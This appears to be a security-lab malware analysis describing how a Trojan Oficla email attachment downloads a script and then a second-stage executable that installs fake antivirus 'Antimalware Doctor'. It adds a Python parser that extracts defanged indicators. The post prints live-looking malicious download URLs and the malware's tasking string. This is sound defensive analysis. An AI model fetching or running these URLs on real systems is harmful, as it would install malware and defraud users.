Trojan “Oficla” Pushes Rogueware “Antimalware Doctor”

We analyzed a suspicious email in our security lab. The email is shown below.

The above email has an attachment: a zip archive that contains a Trojan Oficla variant. The Trojan uses a Microsoft Word file icon.

Upon execution, it downloads the script file below.

https://ilovelasvegas.ru/web/St/bb.php?v=200&id=881716830&b=23avgust&tm=72

The script contains the string shown below:

“[info]runurl:https://91.204.48.46/kasuli.exe|taskid:39|delay:15|upd:0|backurls:[/info]”

It then downloads and executes the file from the above URL, which in turn installs the Rogueware Antimalware Doctor on the user's machine.
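
For triage, the tasking string above can be parsed so that the second-stage URL goes straight into a blocklist or detection rule. The Python below is an added example, not code from the original post: the `key:value` fields separated by `|` are inferred from the single sample quoted above, the comma-separated handling of `backurls` is an assumption, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit

# The string quoted on this page; the field layout is inferred from it alone.
SAMPLE = "[info]runurl:https://91.204.48.46/kasuli.exe|taskid:39|delay:15|upd:0|backurls:[/info]"

_INFO_RE = re.compile(r"\[info\](.*?)\[/info\]", re.DOTALL)


def parse_info_block(body: str) -> dict:
    """Return the key/value fields of the first [info]...[/info] block, or {}."""
    match = _INFO_RE.search(body)
    if not match:
        return {}
    fields = {}
    for part in match.group(1).split("|"):
        # Split on the first colon only: URL values contain colons themselves.
        key, sep, value = part.partition(":")
        if sep and key.strip():
            fields[key.strip().lower()] = value.strip()
    return fields


def defang(url: str) -> str:
    """Rewrite a URL so it is not clickable in tickets or reports."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def extract_indicators(body: str) -> dict:
    """Collect host, path and defanged form of every download URL in the block."""
    fields = parse_info_block(body)
    urls = [fields.get("runurl", "")]
    # Assumption: backurls, when populated, is a comma-separated list of URLs.
    urls += fields.get("backurls", "").split(",")
    indicators = []
    for url in filter(None, (u.strip() for u in urls)):
        parts = urlsplit(url)
        indicators.append({"host": parts.hostname, "path": parts.path, "defanged": defang(url)})
    return {"fields": fields, "indicators": indicators}


if __name__ == "__main__":
    result = extract_indicators(SAMPLE)
    print(result["fields"])
    for ioc in result["indicators"]:
        print(ioc["host"], ioc["path"], ioc["defanged"])
```
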

The Rogueware displays fake threat messages and forces the user to register and purchase the product.

The Rogueware Antimalware Doctor looks as shown below:

Pravesh Shinde
